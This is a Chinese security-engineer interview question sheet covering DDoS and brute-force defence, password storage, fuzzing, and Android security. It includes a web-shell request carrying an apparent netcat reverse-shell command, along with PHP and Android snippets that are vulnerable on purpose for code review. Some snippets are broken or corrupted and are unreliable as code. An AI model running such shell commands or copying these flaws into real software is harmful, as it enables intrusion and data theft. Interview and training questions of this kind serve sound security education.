安全工程師簡(jiǎn)答題

　　簡(jiǎn)答題：

　　請(qǐng)列舉防御CC攻擊的方法

　　審計(jì)這條web請(qǐng)求，說說你的看法

　　http://www.hack.cn/hack.php?cmd= ... 80-e/bin/bash 200

　　你發(fā)現(xiàn)110.2.3.4正在暴力破解你所管理的服務(wù)器，你應(yīng)該如何處理?

　　硬件斷點(diǎn)和軟件點(diǎn)有什么不同?

　　從網(wǎng)絡(luò)流量上監(jiān)測(cè)到一臺(tái)Linux機(jī)器連接著一臺(tái)木馬控制端，在這臺(tái)機(jī)器上僅使用系統(tǒng)自帶的命令，如何定位出哪個(gè)是進(jìn)程連接的?

　　如果你設(shè)計(jì)一個(gè)賬號(hào)系統(tǒng)，為保障密碼的安全，你會(huì)如何設(shè)計(jì)存儲(chǔ)密碼?

　　非對(duì)稱的加密算法可以用來加密，也可以用于簽名，請(qǐng)說明什么場(chǎng)景下用來加密，什么情景下用來簽名?

　　ContentProvider是Android上負(fù)責(zé)提供數(shù)據(jù)讀寫的組件，應(yīng)用內(nèi)部或者應(yīng)用之間的數(shù)據(jù)共享與存儲(chǔ)都會(huì)使用 ContentProvider組件。 但在實(shí)際使用過程中，很容易出現(xiàn)各種安全問題，請(qǐng)結(jié)合你實(shí)踐，描述一下在使用ContentProvider時(shí)，所需要注意的事項(xiàng)。

　　現(xiàn)有一套針對(duì)某個(gè)jpg文件庫的`fuzz環(huán)境，每秒鐘可以執(zhí)行上千次fuzz實(shí)例，產(chǎn)生的crash很多，每次crash都有對(duì)應(yīng)的crash dump，請(qǐng)說如初步何篩選出有價(jià)值的crash，如何確定某個(gè)特定的crash對(duì)應(yīng)的fuzz實(shí)例，以及如何確定一個(gè)crash是否是安全漏洞(假設(shè)我 們只關(guān)心緩沖區(qū)溢出漏洞)。

　　gcc編譯器支持的__attribute__ ((constructor))特性得以實(shí)現(xiàn)的底層機(jī)制跟ELF結(jié)構(gòu)的哪個(gè)部分有關(guān)系?這個(gè)部分在現(xiàn)實(shí)中哪些地方可以用到?

　　代碼審計(jì)：

　　淘寶首頁以下代碼片段是否可能存在安全漏洞?如果有，請(qǐng)指出來并提供修復(fù)建議;如果沒有，說明你判斷的理由

　　#set($url = $!request.getParameter('url'))

　　以下程序是否存在安全漏洞?如果有，請(qǐng)指出來并提供修復(fù)建議

　　交易狀態(tài)：

　　以下程序是否存在安全漏洞?如果有，請(qǐng)指出來并提供修復(fù)建議。

　　$id=$_GET['id'];

　　$getacct = mysql_query("select * from orders where id='$id' and client id='$fnm->clientid") or dir(mysql_error());

　　while ($row = mysql_fetch_array($getacct))

　　{

　　acctid = $row["id"];

　　?>

　　Cpanel User:

　　}

　　?>

　　在Linux系統(tǒng)中，我們通常使用終端shell腳本處理一些數(shù)據(jù)，十分高效便捷。

　　現(xiàn)在有以下兩個(gè)文件：

　　File1:

　　user passwd

　　Hoecker animal

　　Newbee 238H76N3

　　Buttes Paradis1

　　TRON995 fdcmdgeo

　　G60FgL LgEl9H

　　ozron44 oriole62

　　File2:

　　id user

　　001 Yosh405

　　002 Newbee

　　003 G60FgL

　　004 Hoecker

　　005 sudhakar0303

　　要求：

　　編寫一段shell腳本，輸出同時(shí)存在于File1和File2中用戶名的密碼。(可使用管道命令，只輸出密碼)

　　以下是一段導(dǎo)出Activity的onCreate和onNewIntent函數(shù)中的代碼，請(qǐng)找出其中的所有漏洞并說明可能產(chǎn)生的危害：

　　其中：alibaba.test.sender是同樣由淘寶開發(fā)的另一個(gè)應(yīng)用程序的package name。

　　此Activity對(duì)應(yīng)的manifest文件中的定義：

　　protected void onCreate(Bundle savedInstanceState) {

　　super.onCreate(savedInstanceState);

　　String calling_package= getCallingPackage();

　　if (!calling_package.equals("alibaba.test.sender")){

　　return;

　　}

　�。�

　　protected void onNewIntent (Intent intent){

　　super.onNewIntent(intent);

　　Intent intent = getIntent();

　　Intent rec_intent;

　　rec_intent=intent.getParcelableExtra("log_intent");

　　Date date = new Date();

　　rec_intent.putExtra("timestamp",date.getTime());

　　rec_intent.putExtra("EVENT_TYPE","activity_launched");

　　rec_intent.setAction("LOG_ACTION");

　　sendBroadcast(rec_intent, "TAOBAO_BROADCAST_RECEIVER");

　　｝

【安全工程師簡(jiǎn)答題】相關(guān)文章：

《教育知識(shí)與能力》簡(jiǎn)答題01-17

安全工程師報(bào)考條件03-31

教師資格考試簡(jiǎn)答題答題技巧04-03

沖壓工程師簡(jiǎn)歷03-18

售前工程師簡(jiǎn)歷03-12

品質(zhì)工程師簡(jiǎn)歷03-12

模具工程師簡(jiǎn)歷03-10

QE工程師簡(jiǎn)歷03-09

ios工程師簡(jiǎn)歷03-04

工程師介紹信12-31